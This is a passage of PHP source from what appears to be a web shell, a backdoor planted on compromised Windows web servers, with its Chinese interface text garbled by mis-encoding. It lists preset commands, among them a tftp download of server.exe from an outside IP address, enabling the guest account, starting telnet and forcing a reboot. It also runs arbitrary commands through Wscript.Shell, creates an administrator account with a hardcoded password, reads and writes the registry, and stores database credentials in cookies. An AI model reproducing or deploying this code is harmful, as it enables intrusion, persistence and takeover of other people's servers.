\tStr[6] = "ipconfig";
\tStr[7] = "net user guest /active:yes";
\tStr[8] = "copy c:\\\\1.php d:\\\\2.php";
\tStr[9] = "tftp -i 219.134.6.245 get server.exe c:\\\\server.exe";
\tStr[10] = "net start telnet";
\tStr[11] = "shutdown -r -t 0";
\tmform.sqlcmd.value = Str[i];
\treturn true;
}
END;
break;
case "mysql_exec":
if (isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass'])) {
if (@mysql_connect($_POST['mhost'] . ':' . $_POST['mport'], $_POST['muser'], $_POST['mpass'])) {
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost', $_POST['mhost'], $cookietime);
setcookie('m_eanverport', $_POST['mport'], $cookietime);
setcookie('m_eanveruser', $_POST['muser'], $cookietime);
setcookie('m_eanverpass', $_POST['mpass'], $cookietime);
die('���ڵ�½,���Ժ�...');
}
}
print <<
��ַ
�˿�
�û�
����
END;
break;
case "winapi":
//Windows����ӿ�
//function winshell()
//{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript���ʧ��");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : 'silic';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$shell1 = new COM("wscript.shell") or die("require windows host");
$action = isset($_POST['action']) ? $_POST['action'] : '';
echo ' ';
echo '��ȡ&д��&ɾ��ע��� ';
echo ' ';
print << |
END;
$rpath = isset($_POST['rpath']) ? $_POST['rpath'] : '';
$rpath = str_replace("\\\\", "\\", $rpath);
if ($action == "read") {
$out = $shell1->RegRead($rpath);
echo '' . var_dump($out) . ' ';
echo '
';
}
print << |
END;
$wpath = isset($_POST['wpath']) ? $_POST['wpath'] : '';
$wpath = str_replace("\\\\", "\\", $wpath);
$wtype = isset($_POST['wtype']) ? $_POST['wtype'] : '';
$wvalue = isset($_POST['wvalue']) ? $_POST['wvalue'] : '';
if ($action == "write") {
$shell1->RegWrite($wpath, $wvalue, $wtype);
}
print << |